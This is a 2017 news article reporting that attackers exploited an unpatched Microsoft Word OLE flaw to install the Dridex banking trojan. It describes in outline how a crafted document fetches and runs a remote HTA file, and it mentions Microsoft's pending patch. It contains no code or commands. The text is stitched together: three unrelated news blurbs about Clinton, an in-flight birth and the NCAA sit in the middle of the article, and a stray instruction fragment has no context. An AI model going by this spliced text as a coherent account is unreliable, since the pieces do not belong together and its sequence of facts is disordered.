Published: Thu, April 13, 2017
Hi-Tech | By Merle Christensen

Security Alert: Hackers Exploiting Microsoft Word To Infect Computers With Malware

Security Alert: Hackers Exploiting Microsoft Word To Infect Computers With Malware

FireEye researchers who discovered a bug in Word's Object Linking and Embedding technology were working with Microsoft, but were pre-empted by a disclosure from McAfee, as previously reported. Most software vulnerabilities give attackers user level code execution capability.

An unpatched vulnerability in Microsoft Word is being exploited to forward Dridex malware to millions of unsuspecting users.

In a report by ArsTechnica it has been stated that, "the vulnerability is notable because it bypasses exploit mitigations built into Windows, doesn't require targets to enable macros, and works even against Windows 10, which is widely considered Microsoft's most secure operating system ever".

The attack has been found to be being used openly in the wild and Microsoft has been aware of the issue for several weeks.

Microsoft is likely to release a security update along with its next batch of updates, scheduled for this Tuesday.

In the meantime, McAfee has warned users not to open Microsoft Office files obtained from untrusted sources.

Microsoft's Patch Tuesday release of fixes is due tomorrow. "The update addresses the vulnerability by correcting the way that Microsoft Office and WordPad parses specially crafted files, and by enabling API functionality in Windows that Microsoft Office and WordPad will leverage to resolve the identified issue".

Hillary Clinton says 'misogyny played a role' in U.S. presidential election loss
Curiously, she made that observation in response to a question about why white women didn't vote for her. And why and what the underlying reasons why is what I'm trying to parse out myself.

Baby on board: Airline crew delivers baby girl mid-flight
The global airline claimed in a statement that the crew responded promptly as the pregnant woman complained of pain. Kadiju's place of birth, and ultimately her nationality, could be an interesting matter of debate.

NCAA 'reluctantly' agrees to let North Carolina host events
The vote will allow the state to be considered for future tournament hosting, including the 2017-18 season. The board said they had been 'hopeful that the state would fully repeal HB2'.

The exploit connects to a remote server (controlled by the attacker), downloads a file that contains HTML application content, and executes it as an.hta file, according to a blog post by McAfee. OLE, which allows an application to embed other documents or objects, was used in 2014 by an advanced persistent threat group known as Sandworm to target government organizations and infrastructure providers in Europe and North Atlantic Treaty Organisation.

He added that the successful exploit closes the bait Word document, and pops up a fake one to show the victim.

In a blog post, Proofpoint researchers said the vulnerability represents a "significant level of agility and innovation" for the developers of the Dridex banking Trojan, which traditionally spreads to Windows users via macro-based documents in email attachments. In a blog post, the anti-virus company also said that the risky malware attack is possible due to Microsoft's OLE (Object, Linking, and Embedding) technology, TNW has reported.

From the list, click Open in Protected View.

Once the file is open and the exploit runs successfully, Dridex botnet ID 7500 is installed on the user's PC and an attacker can begin hoovering up banking details.

Ryan Hanson, a researcher at security firm Optiv and the person Microsoft credited with reporting the critical bug, said exploits can execute malicious code even when a mitigation known as Protected View isn't disabled.

Like this: